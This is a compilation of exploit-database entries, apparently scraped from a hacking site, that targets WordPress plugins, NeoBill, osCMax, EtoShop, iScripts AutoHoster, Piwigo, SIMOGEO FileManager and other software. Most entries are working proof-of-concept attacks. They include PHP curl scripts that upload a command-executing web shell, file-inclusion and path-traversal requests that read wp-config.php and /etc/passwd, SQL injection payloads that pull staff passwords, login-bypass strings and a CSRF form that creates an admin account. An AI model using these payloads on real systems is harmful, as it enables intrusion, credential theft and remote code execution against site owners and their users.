HireHackking

source: https://www.securityfocus.com/bid/64112/info NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. NeoBill 0.9-alpha is vulnerable; other versions may also be affected. $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target]/install/include/solidstate.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POSTFIELDS, "username='[SQLi]&firstname='[SQLi]&email='[SQLi]"); // or inject in only one ;) curl_setopt($ch, CURLOPT_COOKIE, "language='[SQLi]"); // SQLi via Cookie curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]"); // add cookie-jar header to exploit it ^^ $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf;

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload / Code Exec / Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://www.wordpress.org # ########################################### # # [!] Description : # # Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities # remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files. # #### <?php // page : upload.php // lines : 1030... 1037 $postData = array(); $postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ################## <?php // page : upload.php // lines : 1219... 1237 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####

source: https://www.securityfocus.com/bid/64112/info NeoBill is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands, to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. NeoBill 0.9-alpha is vulnerable; other versions may also be affected. $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target]/install/index.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "language=[LFI]%00"); // LFI 1 curl_setopt($ch, CURLOPT_COOKIE, "language=[LFI]%00"); // LFI 2 ( via cookie ^^ ) curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_[target]"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf;

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin TheCartPress v1.4.7 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : Multiple # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://thecartpress.com # ########################################### # # [!] Description : # # Wordpress plugin TheCartPress v1.4.7 is suffer from multiple vulnerabilities # remote attacker can disclosure some local files or do a remote code execution. # #### // page : Miranda.class.php // lines : 111.. 115 /* --[1] Local File Include -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> /* --[2] Remote Code Execution -- */ <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp/admin-ajax.php?action=tcp_miranda_save_admin_panel&class=[RCE]"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; ####

source: https://www.securityfocus.com/bid/64167/info WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/career-details/?jobid=3'[Sql Injection]

# Author: loneferret of Offensive Security # Product: Cyclope Employee Surveillance Solution (again) # Version: <= 6.8.1 # Vendor Site: http://www.cyclope-series.com/ # Software Download: http://www.cyclope-series.com/download/index.html # Link: http://www.cyclope-series.com/setups/setup.exe # Software description: # The employee monitoring software developed by Cyclope-Series is specially designed to inform # and equip management with statistics relating to the productivity of staff within their organization. # Vulnerability: # Due to insecure file Permissions, a low privileged could potentially # delete, modify or replace many of the key executable files used, and needed # by the software. # Although I haven't checked older versions, I do recall seeing the same file # permissions being set. Making this software extremely prone to lots of fun stuff. ''' File Information ''' A few files with odd-ball permission. Keep in mind all files are like this. All files in c:\xampplite, as well as in Program Files. The "CyclopeClient.exe" is is what is pushed to workstation in order to monitor employees. As we can see, this file's permission is set to "Everybody". So is the uninstaller executable. So gain access to the system, and as a low privileged user one can easily replace httpd.exe or mysqld.exe, with an evil EXE file. Next time that file is executed, you'll get your shell as SYSTEM. Although they'll be out of a service...bummer # C:\xampplite\mysql\bin>icacls mysqld.exe # mysqld.exe BUILTIN\Administrators:(I)(F) # NT AUTHORITY\SYSTEM:(I)(F) # BUILTIN\Users:(I)(RX) # NT AUTHORITY\Authenticated Users:(I)(M) # # Successfully processed 1 files; Failed processing 0 files ---- # C:\xampplite\apache\bin>icacls httpd.exe # httpd.exe BUILTIN\Administrators:(I)(F) # NT AUTHORITY\SYSTEM:(I)(F) # BUILTIN\Users:(I)(RX) # NT AUTHORITY\Authenticated Users:(I)(M) # # Successfully processed 1 files; Failed processing 0 files ---- # C:\xampplite\mysql\bin>icacls mysql.exe # mysql.exe BUILTIN\Administrators:(I)(F) # NT AUTHORITY\SYSTEM:(I)(F) # BUILTIN\Users:(I)(RX) # NT AUTHORITY\Authenticated Users:(I)(M) # # Successfully processed 1 files; Failed processing 0 files ---- # C:\Program Files\Cyclope\Client>icacls CyclopeClient.exe # CyclopeClient.exe Everyone:(F) # # Successfully processed 1 files; Failed processing 0 files ---- # C:\Program Files\Cyclope>icacls unins000.exe # unins000.exe Everyone:(F) # # Successfully processed 1 files; Failed processing 0 files .. .. etc.. .. .. Way too many files to list, essentially whatever this thing installs it's up for grabs.

source: https://www.securityfocus.com/bid/64173/info The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $uploadfile="file.php"; $ch = curl_init(" http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php "); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('FileData'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

source: https://www.securityfocus.com/bid/64255/info eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks. eduTrac 1.1.1 is vulnerable; other versions may also be affected. http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php

source: https://www.securityfocus.com/bid/64278/info BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://example.com/user.php (POST - blog) blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

source: https://www.securityfocus.com/bid/64307/info osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability . Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks. osCMax 2.5.3 is vulnerable; other versions may also be affected. <?php #----------------------------------------------------------------------------- $headers = array("Content-Type: application/octet-stream", "Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\""); #----------------------------------------------------------------------------- $shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re ! $path ="/temp/"; # Sh3lL Path #----------------------------------------------------------------------------- $ch = curl_init("http://www.example.com//oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$shell", 'uploadpath'=>"@$path")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; #----------------------------------------------------------------------------- ?>

source: https://www.securityfocus.com/bid/64329/info EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION]

******************************************************************************************** # Exploit: WinAsm Studio 5.1.8.8 BOF. # Date: 12/6/2015 # Exploit Author: Un_N0n # Vendor: WinAsm # Software Link: http://www.winasm.net/winasm-studio-updates.html # Version: 5.1.8.8 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Info] Code: rc.right = 0; rc.bottom = 0; DrawTextExA( hdc, L"I \t\u6e69\u6c63\u6475e\u6e69\.................\uf64)", <--- XXXtremely big string to draw, thus crashes. 1, &rc, 0x2CE0u, &dtp); *(_DWORD *)(a1 + 420) = rc.right; [How to?] 1 - Open up WinAsm.exe. 2 - GoTo Files -> Open Files. 3 - Browser the crash.txt in it. ~ Software will Crash. [crash.txt?] file = open('crash.txt','w') file.write("A"*20000) #Crash.txt Contains 20000s As file.close() ********************************************************************************************

source: https://www.securityfocus.com/bid/64329/info EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp UserID : x' or ' 1=1-- Password : x' or ' 1=1--

source: https://www.securityfocus.com/bid/64346/info Veno File Manager is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

source: https://www.securityfocus.com/bid/64332/info B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vulnerable. www.example.com/demo/B2BVerticalMarketplace/admin.asp UserID : 1' or '1' = '1 Password : 1' or '1' = '1

source: https://www.securityfocus.com/bid/64363/info Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition. Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users. http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times]

source: https://www.securityfocus.com/bid/64357/info Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible. Piwigo 2.5.3 is vulnerable; other versions may also be affected. <head> <title>POC</title> </head> <body> <form action="http://www.example.com/cms/piwigo/admin.php?page=user_list" id="formid" method="post"> <input type="hidden" name="login" value="crsfpoc123" /> <input type="hidden" name="password" value="Password123@" /> <input type="hidden" name="email" value="xyz@aaww.com" /> <input type="hidden" name="send_password_by_mail" value="1" /> <input type="hidden" name="submit_add" value="Submit" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html>

source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected. http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION]

source: https://www.securityfocus.com/bid/64371/info EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected. www.example.com/dweb/login.asp UserID : x' or ' 1=1-- Password : x' or ' 1=1--

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /checktransferstatus.php Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337 Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337 Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. Time based Blind Injection /additionalsettings.php Post : submit=faris&cmbdomain=%Inject_Here%

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /payinvoiceothers.php invno=%Inject_Here%

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /checktransferstatusbck.php Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337 Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337 Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337

source: https://www.securityfocus.com/bid/64377/info iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. /support/parser/main_smtp.php ^ Just light sandwitch before the fatty food :))

# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability # Date: 2015-12-09 # Exploit Author: HaHwul # Exploit Author Blog: http://www.codeblack.net # Vendor Homepage: https://github.com/simogeo/Filemanager # Software Link: git clone http://github.com/simogeo/Filemanager.git # Version: 2.3.0 # Tested on: Debian [Wheezy] # CVE : none Path Traversal Code http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd Filtering Rules: "../" -> blank Bypass Filtering : ....// -> deleted "../" -> ../ Attack Request GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1 Host: 192.168.0.15 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Response HTTP/1.1 200 OK Date: Tue, 08 Dec 2015 17:18:52 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.3-7+squeeze19 Content-Transfer-Encoding: Binary Content-Length: 1383 Content-Disposition: inline; filename="passwd" Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ..snip.. ################################################### # Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability # Date: 2015-12-09 # Exploit Author: HaHwul # Exploit Author Blog: http://www.codeblack.net # Vendor Homepage: https://github.com/simogeo/Filemanager # Software Link: git clone http://github.com/simogeo/Filemanager.git # Version: 2.3.0 # Tested on: Debian [Wheezy] # CVE : none 1. Upload File POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1 Host: 192.168.0.15 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 Accept: application/json Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cache-Control: no-cache X-Requested-With: XMLHttpRequest Referer: http://192.168.0.15/vul_test/target/Filemanager/ Content-Length: 520 Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737 Connection: keep-alive Pragma: no-cache -----------------------------1675330531498115896355630737 Content-Disposition: form-data; name="mode" add -----------------------------1675330531498115896355630737 Content-Disposition: form-data; name="currentpath" /vul_test/target/Filemanager/userfiles/ -----------------------------1675330531498115896355630737 Content-Disposition: form-data; name="newfile"; filename="shell.txt" Content-Type: text/plain echo "Write PHP WebShell Code"; <html><body><script>alert("45")</script></body></html> -----------------------------1675330531498115896355630737-- 2. Change File Extension(.txt -> .php or .html) & Upload Path Tampering(/userfiles -> /) GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1 Host: 192.168.0.15 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.0.15/vul_test/target/Filemanager/ Connection: keep-alive 3. Call Uploaded File http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php Response HTTP/1.1 200 OK Date: Tue, 08 Dec 2015 17:25:20 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.3-7+squeeze19 Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html echo "Write PHP WebShell Code"; <html><body><script>alert("45")</script></body></html>